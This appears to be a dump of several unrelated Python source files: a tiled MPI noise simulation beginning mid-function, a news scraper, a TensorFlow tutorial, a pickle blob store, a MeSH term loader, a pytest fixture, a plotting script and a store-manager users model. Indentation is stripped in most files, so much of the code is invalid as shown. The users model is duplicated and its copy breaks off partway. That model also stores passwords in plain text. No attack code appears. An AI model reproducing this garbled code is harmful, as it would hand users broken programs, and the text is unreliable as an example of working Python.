# skip smoothing if delta_ell_smooth=0 is passed as arg
elif delta_ell_smooth == 0:
if verbose:
print('Not smoothing')
else:
raise ValueError('delta_ell_smooth must be >= 0')
# update output 2D PS map
smap[map_index_1, pol_index_1, map_index_2, pol_index_2] = power
if not diag: # symmetry
smap[map_index_2, pol_index_2, map_index_1, pol_index_1] = power
# correct for f_sky from mask and apod windows
smap /= sq_f_sky[i]
# take covsqrt of current power, need to reshape so prepended dimensions are 2x2
smap = enmap.multi_pow(smap.reshape((ncomp, ncomp) + smap.shape[-2:]), 0.5, axes=(-4,-3))
# get upper triu of the covsqrt for efficient disk-usage
omap[i] = utils.to_flat_triu(smap, axis1=0, axis2=1, flat_triu_axis=0)
omap = imap.sametiles(omap)
omap = tiled_mpi_manager.Gatherv_tiled_ndmap(omap)
# serial code
if tiled_mpi_manager.is_root:
return omap, ledges, cov_1D
    else:
        # match the three-element return signature of the root process
        return None, None, None
def get_tiled_noise_sim_mpi(covsqrt, ivar=None, flat_triu_axis=1, num_arrays=None, tile_lfunc=None, ledges=None, cov_1D=None,
split=None, seed=None, seedgen_args=None, lowell_seed=False, tiled_mpi_manager=None, verbose=True):
'''Generate a sim from the 2d noise spectra for each of the tiles
'''
# get mpi manager
if tiled_mpi_manager is None:
tiled_mpi_manager = mpi.TiledMPIManager(mpi=False)
# serial code
if tiled_mpi_manager.is_root:
t0 = time.time()
# get ivar, and num_arrays if necessary
if ivar is not None:
assert np.all(ivar >= 0)
# make data 5d, with prepended shape (num_arrays, num_splits, num_pol)
assert ivar.ndim in range(2, 6), 'Data must be broadcastable to shape (num_arrays, num_splits, num_pol, ny, nx)'
ivar = utils.atleast_nd(ivar, 5) # make data 5d
if num_arrays is not None:
assert num_arrays == ivar.shape[0], 'Introspection of ivar shape gives different num_arrays than num_arrays arg'
num_arrays = ivar.shape[0]
else:
assert num_arrays is not None, 'If ivar not passed, must pass num_arrays as arg'
if cov_1D is not None:
assert ledges is not None, 'Must pass ledges if passing cov_1D to filter'
assert len(ledges) == cov_1D.shape[-1] + 1, 'Must be n_ell+1 ledges'
assert covsqrt.tiled, 'Covsqrt must be tiled'
t1 = time.time(); print(f'Init time: {np.round(t1-t0, 3)}')
else:
covsqrt = None
num_arrays = None
# parallel code
covsqrt = tiled_mpi_manager.Scatterv_tiled_ndmap(covsqrt)
num_arrays = tiled_mpi_manager.bcast(num_arrays)
# get component shapes
ncomp = utils.triangular_idx(covsqrt.shape[flat_triu_axis])
num_pol = ncomp // num_arrays
# make the output sim map. covsqrt.shape[-2:] is the tile shape
omap = np.zeros((covsqrt.num_tiles, num_arrays, 1, num_pol) + covsqrt.shape[-2:], dtype=covsqrt.dtype)
if tiled_mpi_manager.is_root and verbose:
print(f'Number of Arrays: {num_arrays}, Number of Pols.: {num_pol}')
# cycle through the tiles
for i, n in enumerate(covsqrt.unmasked_tiles):
if verbose:
print('Doing tile {} of {}'.format(n, covsqrt.numx*covsqrt.numy-1))
# get 2d tile geometry
eshape, ewcs = covsqrt.get_tile_geometry(n)
# get the 2D PS from covsqrt
# subtract 1 from flat_triu_axis since we are doing covsqrt[i]
smap = utils.from_flat_triu(covsqrt[i], axis1=0, axis2=1, flat_triu_axis=flat_triu_axis-1)
if verbose:
print(f'Shape: {smap.shape}')
# apply a filter if passed, and if declination has changed build new filter.
# modlmap calls extent(..., signed=True), so this is the fastest way to check for a change.
# since modifying modes, not PS, use lfunc(...)**0.5; ie lfunc defines how one would modify
# the PS the modes are drawn from
if tile_lfunc is not None:
if i == 0:
f_ell = tile_lfunc(enmap.modlmap(eshape, ewcs).astype(covsqrt.dtype))**0.5
else:
if not np.all(enmap.extent(eshape, ewcs, signed=True) == enmap.extent(eshape, prev_ewcs, signed=True)):
f_ell = tile_lfunc(enmap.modlmap(eshape, ewcs).astype(covsqrt.dtype))**0.5
prev_ewcs = ewcs
smap *= f_ell
# determine the seed. use a seedgen if seedgen_args is not None
if seedgen_args is not None:
# if the split is the seedgen setnum, prepend it to the seedgen args
if len(seedgen_args) == 3: # sim_idx, data_model, qid
seedgen_args = (split,) + seedgen_args
else:
assert len(seedgen_args) == 4 # set_idx, sim_idx, data_model, qid
seedgen_args_tile = seedgen_args + (n,)
seed = seedgen.get_tiled_noise_seed(*seedgen_args_tile, lowell_seed=lowell_seed)
if verbose:
print(f'Seed: {seed}')
# generate the noise and fft to real space
if seed is not None:
np.random.seed(seed)
# determine dtype
if np.dtype(covsqrt.dtype).itemsize == 4:
rand_dtype = np.complex64
elif np.dtype(covsqrt.dtype).itemsize == 8:
rand_dtype = np.complex128
else:
raise TypeError('Only float32 and float64 implemented for now')
# simulate
randn = enmap.rand_gauss_harm((ncomp,) + smap.shape[-2:], ewcs).astype(rand_dtype) # stuck with this casting
smap = enmap.map_mul(smap, randn)
smap = enmap.ifft(smap, normalize='phys').real
smap = smap.reshape((num_arrays, 1, num_pol) + smap.shape[-2:]) # add a dimension for split
# update output map
omap[i] = smap
omap = covsqrt.sametiles(omap)
omap = tiled_mpi_manager.Gatherv_tiled_ndmap(omap)
# must untile serially
if tiled_mpi_manager.is_root:
t2 = time.time(); print(f'Tile sim time: {np.round(t2-t1, 3)}')
omap = omap.from_tiled(power=0.5, return_as_enmap=False)
t3 = time.time(); print(f'Stitch time: {np.round(t3-t2, 3)}')
# determine whether to filter
if tiled_mpi_manager.is_root:
to_filter = cov_1D is not None
else:
to_filter = None
to_filter = tiled_mpi_manager.bcast(to_filter)
# prepare omap for parallel filtering, if necessary
if to_filter:
if tiled_mpi_manager.is_root:
assert (num_arrays, num_pol) == cov_1D.shape[:-1], 'cov_1D shape does not match (num_arrays, num_pol, ...)'
assert (num_arrays, 1, num_pol) == omap.shape[:-2], 'omap shape does not match (num_arrays, 1, num_pol, ...)'
cov_1D = cov_1D.reshape(-1, *cov_1D.shape[-1:])
omap = omap.reshape(-1, *omap.shape[-2:])
ledges = tiled_mpi_manager.Bcast(ledges)
cov_1D = tiled_mpi_manager.Scatterv(cov_1D)
omap = tiled_mpi_manager.Scatterv_tiled_ndmap(omap)
else:
ledges = tiled_mpi_manager.Bcast(None)
cov_1D = tiled_mpi_manager.Scatterv(None)
omap = tiled_mpi_manager.Scatterv_tiled_ndmap(None)
# do filtering in parallel to save a little time, can only scatter maps to filter unfortunately
for i in range(len(cov_1D)):
ilfunc = utils.interp1d_bins(ledges, cov_1D[i], bounds_error=False)
olfunc = lambda l: np.sqrt(ilfunc(l))
omap[i] = utils.ell_filter(omap[i], olfunc)
omap = tiled_mpi_manager.Gatherv_tiled_ndmap(omap)
# do ivar-weighting serially
if tiled_mpi_manager.is_root:
# reshape omap back to (num_arrays, 1, num_pol, ...)
omap = omap.reshape(num_arrays, 1, num_pol, *omap.shape[-2:]).to_ndmap()
t4 = time.time(); print(f'Filter time: {np.round(t4-t3, 3)}')
# if ivar is not None, unwhiten the imap data using ivar
if ivar is not None:
splitslice = utils.get_take_indexing_obj(ivar, split, axis=-4)
ivar = ivar[splitslice]
ivar = np.broadcast_to(ivar, omap.shape)
omap[ivar != 0] /= np.sqrt(ivar[ivar != 0])
t5 = time.time(); print(f'Ivar-weight time: {np.round(t5-t4, 3)}')
return omap
else:
        return None
python_news.py | rayjustinhuang/BitesofPy | 0 | 6616799 | <filename>python_news.py
from collections import namedtuple
from bs4 import BeautifulSoup
import requests
# feed = https://news.python.sc/, to get predictable results we cached
# first two pages - use these:
# https://bites-data.s3.us-east-2.amazonaws.com/news.python.sc/index.html
# https://bites-data.s3.us-east-2.amazonaws.com/news.python.sc/index2.html
Entry = namedtuple('Entry', 'title points comments')
def _create_soup_obj(url):
"""Need utf-8 to properly parse emojis"""
resp = requests.get(url)
resp.encoding = "utf-8"
return BeautifulSoup(resp.text, "html.parser")
def get_top_titles(url, top=5):
"""Parse the titles (class 'title') using the soup object.
Return a list of top (default = 5) titles ordered descending
by number of points and comments.
"""
soup = _create_soup_obj(url)
    # parse each title together with its points/comments controls
    titles = soup.find_all('span', class_='title')
    points = soup.find_all('span', class_='controls')
    title_list = []
    for title, point in zip(titles, points):
        controls = point.find('span', class_='smaller').text.strip().split()
        p = int(controls[0])
        c = int(controls[-2])
        t = title.find('a').text
        subtitle = title.find('span', class_='smaller')
        if subtitle is not None:
            t += " " + subtitle.text
        title_list.append(Entry(t, p, c))
    return sorted(title_list, key=lambda x: (x.points, x.comments), reverse=True)[:top]
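# Usage sketch (illustrative addition): the cached first page listed in the
# header comment gives reproducible results for a quick manual check.
if __name__ == "__main__":
    url = "https://bites-data.s3.us-east-2.amazonaws.com/news.python.sc/index.html"
    for entry in get_top_titles(url):
        print(f"{entry.points:>4} points | {entry.comments:>3} comments | {entry.title}")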
Image_classification.py | imartinezl/picnic-hackathon-2019 | 1 | 6616800 | <reponame>imartinezl/picnic-hackathon-2019
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 1 16:52:40 2019
@author: imartinez
"""
# Tensorflow tutorial on image classification and image load
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import tensorflow as tf
import math
tf.enable_eager_execution()
tf.VERSION
x = tf.random_uniform([3, 3])
print("Is there a GPU available: "),
print(tf.test.is_gpu_available())
print("Is the Tensor on GPU #0: "),
print(x.device.endswith('GPU:0'))
# Tensor Slices
def function(num):
print(type(num))
return tf.square(num) + 1
ds_tensors = tf.data.Dataset.from_tensor_slices([1, 2, 3, 4, 5, 6])
ds_tensors = ds_tensors.map(function).shuffle(2).batch(2)
print('Elements of ds_tensors:')
for x in ds_tensors:
print(x)
# Gradient Calculation
x = tf.constant([[1.0, 2.0], [3.0, 4.0]])
#x = tf.ones((2, 2))
with tf.GradientTape(persistent=False) as t:
t.watch(x)
y = tf.reduce_sum(tf.square(x))
z = tf.multiply(y, y)
dz_dx = t.gradient(z, x)
for i in [0, 1]:
for j in [0, 1]:
print(dz_dx[i][j].numpy())
# =============================================================================
# TENSORFLOW PIPELINE
# =============================================================================
data = pd.read_csv('train.tsv', sep='\t')
image_count = data.shape[0]
label_names = data.label.unique()
label_to_index = dict((name, index) for index, name in enumerate(label_names))
data['label_index'] = [label_to_index[label] for label in data.label]
# =============================================================================
# A dataset of paths
# =============================================================================
image_paths = "./train/" + data.file.values
path_ds = tf.data.Dataset.from_tensor_slices(image_paths)
print('shape: ', repr(path_ds.output_shapes))
print('type: ', path_ds.output_types)
print()
print(path_ds)
# =============================================================================
# A dataset of images
# =============================================================================
def preprocess_image(image):
image = tf.image.decode_jpeg(image, channels=3)
image = tf.image.resize_images(image, [192, 192])
image /= 255.0 # normalize to [0,1] range
return image
def load_and_preprocess_image(path):
image = tf.read_file(path)
return preprocess_image(image)
AUTOTUNE = tf.data.experimental.AUTOTUNE
image_ds = path_ds.map(load_and_preprocess_image, num_parallel_calls=AUTOTUNE)
plt.figure(figsize=(8, 8))
for n, image in enumerate(image_ds.shuffle(20).take(4)):
plt.subplot(2, 2, n+1)
plt.imshow(image)
plt.grid(False)
plt.xticks([])
plt.yticks([])
# =============================================================================
# A dataset of (image, label) pairs
# =============================================================================
image_labels = data.label_index
label_ds = tf.data.Dataset.from_tensor_slices(tf.cast(image_labels, tf.int64))
for label in label_ds.take(10):
print(str(label.numpy()) + ' ' + label_names[label.numpy()])
image_label_ds = tf.data.Dataset.zip((image_ds, label_ds))
print('image shape: ', image_label_ds.output_shapes[0])
print('label shape: ', image_label_ds.output_shapes[1])
print('types: ', image_label_ds.output_types)
print()
print(image_label_ds)
image_label_ds = tf.data.Dataset.from_tensor_slices((image_paths, image_labels))
def load_and_preprocess_from_path_label(path, label):
return load_and_preprocess_image(path), label
image_label_ds = image_label_ds.map(load_and_preprocess_from_path_label)
image_label_ds
# Setting a shuffle buffer size as large as the dataset ensures that the data is
# completely shuffled.
ds = image_label_ds.shuffle(buffer_size=image_count)
ds = ds.repeat()
BATCH_SIZE = 32
ds = ds.batch(BATCH_SIZE)
# `prefetch` lets the dataset fetch batches, in the background while the model is training.
ds = ds.prefetch(buffer_size=AUTOTUNE)
ds
mobile_net = tf.keras.applications.MobileNetV2(input_shape=(192, 192, 3), include_top=False)
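# MobileNetV2 expects pixel values in [-1, 1]; the pipeline above yields
# [0, 1], so change_range below rescales each batch accordingly.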
mobile_net.trainable = False
def change_range(image, label):
    return 2 * image - 1, label
ds = ds.map(change_range)
image_batch, label_batch = next(iter(ds))
feature_map_batch = mobile_net(image_batch)
print(feature_map_batch.shape)
model = tf.keras.Sequential([
mobile_net,
tf.keras.layers.GlobalAveragePooling2D(),
tf.keras.layers.Dense(len(label_names))
])
logit_batch = model(image_batch).numpy()
print("min logit: ", logit_batch.min())
print("max logit: ", logit_batch.max())
print()
print("Shape:", logit_batch.shape)
model.compile(optimizer = tf.train.AdamOptimizer(),
loss = tf.keras.losses.sparse_categorical_crossentropy,
metrics = [tf.keras.metrics.categorical_accuracy])
len(model.trainable_variables)
model.summary()
steps_per_epoch = tf.ceil(len(image_paths)/BATCH_SIZE).numpy()
steps_per_epoch
model.fit(ds, epochs=1, steps_per_epoch=3)
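# Added sketch: a quick sanity check of the trained head on one batch.
# (Assumes eager execution, as enabled at the top of this script.)
logits = model(image_batch)
predicted = tf.argmax(logits, axis=1).numpy()
print("sample predictions:", [label_names[i] for i in predicted[:5]])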
blob_store.py | gbinside/python_persisten_objects | 0 | 6616801 | <filename>blob_store.py
import pickle
import struct
import contextlib
# header
# len Q 64 bit unsigned
# additional to skip Q 64 bit unsigned
# deleted ? bool
from tempfile import SpooledTemporaryFile
HEADER_FORMAT = '<QQ?'
HEADER_SIZE = struct.calcsize(HEADER_FORMAT)
@contextlib.contextmanager
def ignored(*exceptions):
try:
yield
except exceptions:
pass
class BlobStore(object):
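    """Append-only store of pickled objects in a single binary file.

    Each record is a struct header (payload length, extra bytes to skip,
    deleted flag) followed by the pickled payload.  Deletion only sets the
    flag and records the slot in ``self._holes``; ``add`` reuses a hole when
    the new payload fits, and ``vacuum`` rewrites the file without holes.
    """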
def __init__(self, fp):
self._fp = fp
self._holes = {ptr: l1 + l2 for ptr, l1, l2, deleted in self.headers() if deleted}
def _append(self, obj):
encoded_obj = pickle.dumps(obj)
length = len(encoded_obj)
self._fp.write(struct.pack(HEADER_FORMAT, length, 0, False))
self._fp.write(encoded_obj)
self._fp.flush()
def add(self, obj):
encoded_obj = pickle.dumps(obj)
length = len(encoded_obj)
ptr, previous_len = self._find_space(length)
self._fp.seek(ptr, 0)
self._fp.write(struct.pack(HEADER_FORMAT, length, previous_len - length, False))
self._fp.write(encoded_obj)
self._fp.flush()
with ignored(KeyError):
del self._holes[ptr]
return ptr
def get(self, ptr):
self._fp.seek(ptr, 0)
length, _, deleted = struct.unpack(HEADER_FORMAT, self._fp.read(HEADER_SIZE))
if deleted:
            raise ValueError('object was deleted')
obj = pickle.loads(self._fp.read(length))
return obj
def delete(self, ptr):
self._fp.seek(ptr, 0)
length, add, deleted = struct.unpack(HEADER_FORMAT, self._fp.read(HEADER_SIZE))
self._fp.seek(ptr, 0)
self._fp.write(struct.pack(HEADER_FORMAT, length + add, 0, True))
self._fp.flush()
self._holes[ptr] = length + add
def _find_space(self, length):
for ptr, curr_length in self._holes.items():
if curr_length >= length:
return ptr, curr_length
ret = self._fp.seek(0, 2)
if ret is None:
ret = 0
return ret, length
def headers(self):
self._fp.seek(0, 0)
while True:
raw_data = self._fp.read(HEADER_SIZE)
if not raw_data:
break
curr_length, additionals_bytes, deleted = struct.unpack(HEADER_FORMAT, raw_data)
yield self._fp.tell() - HEADER_SIZE, curr_length, additionals_bytes, deleted
self._fp.seek(curr_length + additionals_bytes, 1)
def __iter__(self):
self._fp.seek(0, 0)
while True:
raw_data = self._fp.read(HEADER_SIZE)
if not raw_data:
break
curr_length, additionals_bytes, deleted = struct.unpack(HEADER_FORMAT, raw_data)
if not deleted:
obj = pickle.loads(self._fp.read(curr_length))
yield obj
self._fp.seek(additionals_bytes, 1)
else:
self._fp.seek(curr_length + additionals_bytes, 1)
def items(self):
self._fp.seek(0, 0)
while True:
raw_data = self._fp.read(HEADER_SIZE)
if not raw_data:
break
curr_length, additionals_bytes, deleted = struct.unpack(HEADER_FORMAT, raw_data)
obj = pickle.loads(self._fp.read(curr_length))
yield self._fp.tell() - HEADER_SIZE - curr_length, curr_length, additionals_bytes, deleted, obj
self._fp.seek(additionals_bytes, 1)
def vacuum(self):
with SpooledTemporaryFile() as ftemp:
bstemp = BlobStore(ftemp)
for x in self:
bstemp._append(x)
ftemp.seek(0, 0)
self._fp.seek(0, 0)
for data in iter(lambda: ftemp.read(4096), b''):
self._fp.write(data)
self._fp.truncate()
self._fp.flush()
self._holes.clear()
def main():
open('blobfile', 'wb').close()
with open('blobfile', 'r+b') as blob:
bs = BlobStore(blob)
ptr = bs.add('stringa')
ptr2 = bs.add('stringa2')
ptr3 = bs.add('stringa3')
assert 'stringa' == bs.get(ptr)
assert 'stringa2' == bs.get(ptr2)
assert 'stringa3' == bs.get(ptr3)
bs.delete(ptr2)
try:
bs.get(ptr2)
assert False
except ValueError:
pass
ptr4 = bs.add('4')
assert '4' == bs.get(ptr4)
assert ptr4 < ptr3
for x in bs.items():
print(x)
bs.delete(ptr4)
ptr5 = bs.add('55')
assert '55' == bs.get(ptr5)
assert ptr5 == ptr4
bs.delete(ptr5)
for x in bs.headers():
print(x)
for x in bs:
print(x)
assert 'stringa' in bs
assert '55' not in bs
print('prevacuum')
for x in bs.items():
print(x)
bs.vacuum()
print('postvacuum')
for x in bs.items():
print(x)
if __name__ == "__main__":
    main()
biotermhub/inputfilters/mesh.py | OntoGene/BioTermHub_dockerized | 1 | 6616802 | #!/usr/bin/env python3
# coding: utf8
# Author: <NAME>, 2016
'''
Collect MeSH descriptions and supplements ("mesh-{desc,supp}.json.pile").
'''
import json
from collections import namedtuple
from datetime import datetime
from lxml import etree
from termhub.inputfilters._base import IterConceptRecordSet
# These headings for the initial letter of the MeSH Tree numbers are not given
# anymore in the 2016 release.
# Should we still use them?
TREES = {
'A': 'Anatomy',
'B': 'Organisms',
'C': 'Diseases',
'D': 'Chemicals and Drugs',
'E': 'Analytical,Diagnostic and Therapeutic Techniques and Equipment',
'F': 'Psychiatry and Psychology',
'G': 'Phenomena and Processes',
'H': 'Disciplines and Occupations',
'I': 'Anthropology,Education,Sociology and Social Phenomena',
'J': 'Technology,Industry,Agriculture',
'K': 'Humanities',
'L': 'Information Science',
'M': 'Named Groups',
'N': 'Health Care',
'V': 'Publication Characteristics',
'Z': 'Geographicals',
}
DescEntry = namedtuple('DescEntry', 'id pref terms trees')
SuppEntry = namedtuple('SuppEntry', 'id pref terms refs')
YEAR = datetime.now().year
class RecordSet(IterConceptRecordSet):
'''
Record collector for MeSH.
'''
resource = None # Not a fixed field.
entity_type = None # Not a fixed field.
dump_fn = ('mesh-desc.json.pile', 'mesh-supp.json.pile')
remote = tuple('ftp://nlmpubs.nlm.nih.gov/online/mesh/MESH_FILES/xmlmesh/'
'{}{}.gz'.format(level, YEAR) for level in ('desc', 'supp'))
source_ref = 'https://www.nlm.nih.gov/pubs/factsheets/mesh.html'
tree_type_defaults = {
'B': 'organism',
'C': 'disease',
'D': 'chemical',
}
def __init__(self, tree_types=None, mapping=None, **kwargs):
# Do not give mapping to the superclass, since those fields are not
# fixed for MeSH.
super().__init__(**kwargs)
if tree_types is None:
tree_types = self.tree_type_defaults
self._tree_types = tree_types
self._desc_names = self._resource_name_by_tree('desc', tree_types)
self._supp_names = self._resource_name_by_tree('supp', tree_types)
self._resource_mapping = {
name: self.mapping(mapping, 'resource', name)
for name in self.resource_names(tree_types)}
self._entity_type_mapping = {
name: self.mapping(mapping, 'entity_type', name)
for name in self.entity_type_names(tree_types)}
def _iter_concepts(self):
for entry, tree, resource in self._iter_entries():
entity_type = self._entity_type_mapping[self._tree_types[tree]]
resource = self._resource_mapping[resource]
yield entry.id, entry.pref, entry.terms, entity_type, resource
def _iter_entries(self):
'''
Iterate over descriptors and supplementals.
'''
ref_trees = {}
for entry in self._iter_desc():
trees = set(entry.trees)
ref_trees[entry.id] = trees
for tree in trees.intersection(self._tree_types):
resource = self._desc_names[tree]
yield entry, tree, resource
for entry in self._iter_supp():
trees = set(t for id_ in entry.refs for t in ref_trees[id_])
for tree in trees.intersection(self._tree_types):
resource = self._supp_names[tree]
yield entry, tree, resource
def _iter_desc(self):
'''
Iterate over DescriptorRecord entries.
'''
return self._get_json_pile(self.fn[0], DescEntry)
def _iter_supp(self):
'''
Iterate over SupplementalRecord entries.
'''
return self._get_json_pile(self.fn[1], SuppEntry)
@staticmethod
def _get_json_pile(fn, container):
'''
JSON pile: text file with one JSON fragment per line.
'''
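        # Example line (hypothetical values), matching the tuples written by
        # _prep_desc below: ["D012345", "Some Heading", ["Some Heading", "A Synonym"], ["C"]]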
with open(fn, encoding='ascii') as f:
for line in f:
entry = container(*json.loads(line))
yield entry
@classmethod
def _prep_desc(cls, stream):
'''
Preprocess DescriptorRecord entries and save them in a JSON pile.
'''
for _, record in etree.iterparse(stream, tag='DescriptorRecord'):
# DescriptorName/String seems to be always the same as
# .//Term[@RecordPreferredTermYN="Y"]/String,
# so it's probably safe to use either as preferred term.
# There's no need to add DescriptorName/String or
# .//ConceptName/String to the terms set,
# as these are all included in the .//Term/String nodes.
line = json.dumps((
record.find('DescriptorUI').text,
record.find('DescriptorName/String').text,
tuple(set(n.text for n in record.iterfind('.//Term/String'))),
[n.text[0] for n in record.iterfind('.//TreeNumber')],
)) + '\n'
record.clear()
yield line.encode('ascii')
@classmethod
def _prep_supp(cls, stream):
'''
Preprocess SupplementalRecord entries and save them in a JSON pile.
'''
for _, record in etree.iterparse(stream, tag='SupplementalRecord'):
line = json.dumps((
record.find('SupplementalRecordUI').text,
record.find('SupplementalRecordName/String').text,
tuple(set(n.text for n in record.iterfind('.//Term/String'))),
[n.text.lstrip('*') # What does the * mean in ref IDs?
for n in record.iterfind('.//DescriptorUI')],
)) + '\n'
record.clear()
yield line.encode('ascii')
@classmethod
def dump_label(cls):
return 'MeSH'
@classmethod
def update_info(cls):
steps = zip(cls.remote, (cls._prep_desc, cls._prep_supp), cls.dump_fn)
return [(r, 'gz', prep, fn) for r, prep, fn in steps]
@classmethod
def resource_names(cls, trees=None):
if trees is None:
trees = cls.tree_type_defaults.keys()
return [name
for s in ('desc', 'supp')
for name in cls._resource_name_by_tree(s, trees).values()]
@staticmethod
def _resource_name_by_tree(subresource, trees):
return {t: 'MeSH {} ({})'.format(subresource, TREES[t])
for t in trees}
@classmethod
def entity_type_names(cls, tree_types=None):
if tree_types is None:
tree_types = cls.tree_type_defaults
        return list(tree_types.values())
tests/conftest.py | ThiefMaster/logstapo | 7 | 6616803 | <filename>tests/conftest.py<gh_stars>1-10
import pytest
@pytest.fixture
def mock_config(mocker):
def _mock_config(config):
mocker.patch('logstapo.config._ConfigDict.data', config)
    return _mock_config
phase_reset/weak coupling/xpp_to_py.py | helene-todd/M2_thesis_code | 0 | 6616804 | <gh_stars>0
from matplotlib import cm, rcParams
import matplotlib.pyplot as plt
import matplotlib as matplotlib
from matplotlib import patheffects
import numpy as np
import math as math
import random as rand
import os
import csv
rcParams.update({'figure.autolayout': True})
#matplotlib.pyplot.xkcd(scale=.5, length=100, randomness=2)
#rcParams['path.effects'] = [patheffects.withStroke(linewidth=.5)]
c = ['#aa3863', '#3b7d86', '#5443a3']
times_plot1, times_plot2 = [], []
V1_plot1, V2_plot1, V1_plot2, V2_plot2 = [], [], [], []
I_plot1, I_plot2 = [], []
Vth = 1
Vr = 0
fig, ax = plt.subplots(2, 2, figsize=(16,6), sharey='row', sharex='col')
k = 0
with open('phase_reset.dat', newline='') as file:
datareader = csv.reader(file, delimiter=' ')
for row in datareader:
        if 0 <= float(row[0]) <= 25 and k % 20 == 0:
times_plot1.append(float(row[0]))
V1_plot1.append(float(row[1]))
V2_plot1.append(float(row[2]))
I_plot1.append(float(row[3]))
        if 885 <= float(row[0]) <= 910 and k % 20 == 0:
times_plot2.append(float(row[0]))
V1_plot2.append(float(row[1]))
V2_plot2.append(float(row[2]))
I_plot2.append(float(row[3]))
k += 1
# A spike occurs iff there was a reset
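# Detection heuristic: between consecutive samples, a drop larger than half
# the threshold-to-reset distance (while both samples sit below threshold)
# can only come from a reset, so a marker point at Vth + 0.5 and a duplicated
# time stamp are spliced in purely for plotting the spike.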
for i in range(1,len(V1_plot1)) :
if abs(V1_plot1[i]-V1_plot1[i-1]) > (Vth-Vr)/2 and V1_plot1[i] < 1 and V1_plot1[i-1] < 1:
V1_plot1.insert(i, Vth+0.5)
V2_plot1.insert(i, V2_plot1[i])
I_plot1.insert(i, I_plot1[i])
times_plot1.insert(i, times_plot1[i])
if abs(V2_plot1[i]-V2_plot1[i-1]) > (Vth-Vr)/2 and V2_plot1[i] < 1 and V2_plot1[i-1] < 1:
V2_plot1.insert(i, Vth+0.5)
V1_plot1.insert(i, V1_plot1[i])
I_plot1.insert(i, I_plot1[i])
times_plot1.insert(i, times_plot1[i])
for i in range(1,len(V1_plot2)) :
if abs(V1_plot2[i]-V1_plot2[i-1]) > (Vth-Vr)/2 and V1_plot2[i] < 1 and V1_plot2[i-1] < 1:
V1_plot2.insert(i, Vth+0.5)
V2_plot2.insert(i, V2_plot2[i])
I_plot2.insert(i, I_plot2[i])
times_plot2.insert(i, times_plot2[i])
if abs(V2_plot2[i]-V2_plot2[i-1]) > (Vth-Vr)/2 and V2_plot2[i] < 1 and V2_plot2[i-1] < 1:
V2_plot2.insert(i, Vth+0.5)
V1_plot2.insert(i, V1_plot2[i])
I_plot2.insert(i, I_plot2[i])
times_plot2.insert(i, times_plot2[i])
ax[1, 0].plot(times_plot1, V1_plot1, alpha=1, color=c[0], linestyle='-') #alpha=0.75
ax[1, 0].plot(times_plot1, V2_plot1, alpha=1, color=c[1], linestyle='-') #alpha=0.75
ax[0, 0].plot(times_plot1, I_plot1, alpha=1, color=c[2], linestyle='-') #alpha=0.75
ax[1, 1].plot(times_plot2, V1_plot2, alpha=1, color=c[0], linestyle='-', label='$V_1$') #alpha=0.75
ax[1, 1].plot(times_plot2, V2_plot2, alpha=1, color=c[1], linestyle='-', label='$V_2$') #alpha=0.75
ax[0, 1].plot(times_plot2, I_plot2, alpha=1, color=c[2], linestyle='-', label='$I$') #alpha=0.75
ax[1, 0].set_xlabel('Time ($10^{-2}$ seconds)', size=14)
ax[1, 1].set_xlabel('Time ($10^{-2}$ seconds)', size=14)
ax[1, 0].set_ylabel('Voltage $V_k, k \in \{1,2\}$', size=14)
ax[0, 0].set_ylabel('Current $I$', size=14)
ax[0, 0].set_ylim(0, 20)
fig.suptitle('System is perturbed by a pulse current', size=18)
ax[0,1].legend(loc='upper right', bbox_to_anchor=(1, 0.95), fontsize=13)
ax[1,1].legend(loc='upper right', bbox_to_anchor=(1, 0.95), fontsize=13)
plt.tight_layout()
plt.savefig('from_as_to_as.svg')
#plt.show()
app/version1/users/models.py | SimonAwiti/Store-manager-app-endpoints | 0 | 6616805 | <reponame>SimonAwiti/Store-manager-app-endpoints
"""users data structures"""
import re
import datetime
"""defining global variables"""
users = [{
"user_id":0,
"email": "<EMAIL>",
"username": "administrator",
"password": "<PASSWORD>",
"role": "admin"
}]
user_id = 1
class User:
def __init__(self):
"""initializing user constructor"""
self.email = ""
self.username = ""
self.password = ""
self.role = ""
@staticmethod
def validate_details(details):
"""checks if the user details are relevant before registering"""
if not details:
return "Please enter data for registration"
#if bool(re.search(r'@', details["email"])) is False:
#return "Your email should have an @ in it"
for user in range(len(users)):
if users[user]["email"] == details["email"]:
return "Email already in use, register with another email"
if details["role"] != "admin" and details["role"] != "attendant":
return "You can only register as an admin or attendant"
return True
def add_new_user(self, details):
"""registering a new user"""
# global variable
global user_id
# check details for data
if not details:
return "Please enter information for registration"
# check validity of data
if self.validate_details(details) is True:
users.append({
"user_id": user_id,
"email": self.email,
"username": self.username,
"password": self.password,
"role": self.role
})
user_id += 1
return "User added Successfully!"
return "Ensure that the details are relevant before adding a user!"
def get_users(self):
"""get all users"""
if not users:
return "There are no users registered!"
return users
def get_one_user(self, user_id):
"""fetch a specific user"""
if isinstance(user_id, int) is False:
return "User Id should be a number"
for user in range(len(users)):
if user_id != users[user]["user_id"]:
continue
return users[user]
def validate_user(self, details):
"""validate user details while loging in"""
if not details:
return "Please enter data for registration"
if not users:
return "No registered users"
        for user in range(len(users)):
            # both username and password must match the same user record
            if users[user]['username'] != details["username"] or users[user]['password'] != details["password"]:
                continue
            return "Login Successful!"
        return "Invalid username or password"
def edit_user_role(self, user_id, role):
"""Admin changes attendant role to admin"""
if not users:
return "No registered users"
if isinstance(user_id, int) is False:
return "User Id should be a number"
        for user in range(len(users)):
            if user_id != users[user]["user_id"]:
                continue
            # index into users (the loop variable is an int) and use a role
            # name accepted by validate_details
            users[user]["role"] = "admin"
return "Attendant was promoted to admin"
| """users data structures"""
import re
import datetime
"""defining global variables"""
users = [{
"user_id":0,
"email": "<EMAIL>",
"username": "administrator",
"password": "<PASSWORD>",
"role": "admin"
}]
user_id = 1
class User:
def __init__(self):
"""initializing user constructor"""
self.email = ""
self.username = ""
self.password = ""
self.role = ""
@staticmethod
def validate_details(details):
"""checks if the user details are relevant before registering"""
if not details:
return "Please enter data for registration"
#if bool(re.search(r'@', details["email"])) is False:
#return "Your email should have an @ in it"
for user in range(len(users)):
if users[user]["email"] == details["email"]:
return "Email already in use, register with another email"
if details["role"] != "admin" and details["role"] != "attendant":
return "You can only register as an admin or attendant"
return True
def add_new_user(self, details):
"""registering a new user"""
# global variable
global user_id
# check details for data
if not details:
return "Please enter information for registration"
# check validity of data
if self.validate_details(details) is True:
users.append({
"user_id": user_id,
"email": self.email,
"username": self.username,
"password": self.password,
"role": self.role
})
user_id += 1
